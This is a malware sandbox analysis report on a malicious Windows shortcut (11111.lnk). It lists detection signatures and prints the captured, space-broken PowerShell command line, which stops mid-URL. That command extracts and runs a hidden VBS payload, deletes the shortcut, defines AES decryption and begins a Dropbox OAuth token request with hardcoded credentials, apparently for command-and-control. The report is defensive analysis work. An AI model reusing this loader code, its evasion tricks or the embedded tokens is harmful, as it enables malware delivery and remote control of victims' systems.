Edit tour
Windows
Analysis Report
11111.lnk
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Windows shortcut file (LNK) starts blacklisted processes
Deletes itself after installation
Encrypted powershell cmdline option found
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Powershell creates an autostart link
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3192 cmdline:
"C:\Window s\system32 \cmd.exe" /c p owershell -windowsty le hidden -nop -NoPr ofile -Non Interactiv e -c "$tmp = 'C:\Use rs\user\Ap pData\Loca l\Temp';$l nkpath = G et-ChildIt em *.lnk;f oreach ($p ath in $ln kpath) { i f ($path.l ength -eq 0x0010F27C ) { $lnkpa th = $path ;}}foreach ($item in $lnkpath) { $lnkpat h = $item. Name;}$Inp utStream = New-Objec t System.I O.FileStre am($lnkpat h, [IO.Fil eMode]::Op en, [Syste m.IO.FileA ccess]::Re ad);$file= New-Object Byte[]($I nputStream .length);$ len=$Input Stream.Rea d($file,0, $file.Leng th);$Input Stream.Dis pose();wri te-host \" readfileen d\";$path = $lnkpath .substring (0,$lnkpat h.length-4 );$path1 = 'C:\Users \user\AppD ata\Local\ Temp\tmp' + (Get-Ran dom) + '.v bs';$len1 = 1057248 ;$len2 = 1110496;$l en3 = 111 0496;$temp = New-Obj ect Byte[] ($len2-$le n1);write- host \"exe start\";fo r($i=$len1 ; $i -lt $ len2; $i++ ) { $temp[ $i-$len1] = $file[$i ]};sc $pat h ([byte[] ]$temp) -E ncoding By te;write-h ost \"exee nd\";$temp = New-Obj ect Byte[] ($file.Len gth-$len3) ;for($i=$l en3; $i -l t $file.Le ngth; $i++ ) { $temp[ $i-$len3] = $file[$i ]}; $encDa ta_b64 = S tart-Proce ss -FilePa th $path;[ System.IO. File]::Del ete($lnkpa th);Functi on AESDecr ypt { para m ( [Byte[ ]]$bytes,[ String]$pa ss=\"pa55w 0rd\") $In putStream = New-Obje ct System. IO.MemoryS tream(,$by tes);$Outp utStream = New-Objec t System.I O.MemorySt ream;$Salt = New-Obj ect Byte[] (32);$Byte sRead = $I nputStream .Read($Sal t, 0, $Sal t.Length); if ( $Byte sRead -ne $Salt.Leng th ) { exi t;} $PBKDF 2 = New-Ob ject Syste m.Security .Cryptogra phy.Rfc289 8DeriveByt es($pass, $Salt);$AE SKey = $PB KDF2.GetBy tes(32);$A ESIV = $PB KDF2.GetBy tes(16);$A ES = New-O bject Secu rity.Crypt ography.Ae sManaged;$ Dec = $AES .CreateDec ryptor($AE SKey, $AES IV);$Crypt oStream = New-Object System.Se curity.Cry ptography. CryptoStre am($InputS tream, $De c, [System .Security. Cryptograp hy.CryptoS treamMode] ::Read);$C ryptoStrea m.CopyTo($ OutputStre am);$Outpu tStream.Di spose();re turn $Outp utStream.T oArray();} $clientID = \"oj8kd 1lzqrw7v3m \";$client Secret = \ "vwp27gyte kx9jfq\";$ refreshTok en = \"wR3 _ULk2OicAA AAAAAAAAV8 1-_COcFPa8 SN0V5K-ZPT YB-BVIH5E1 c4_fqLOCC_ u\";$body = @{grant_ type=\"ref resh_token \";refresh _token=$re freshToken ;client_id =$clientID ;client_se cret=$clie ntSecret}; $tokenEndp oint = \"h ttps://api .dropboxap i.com/oaut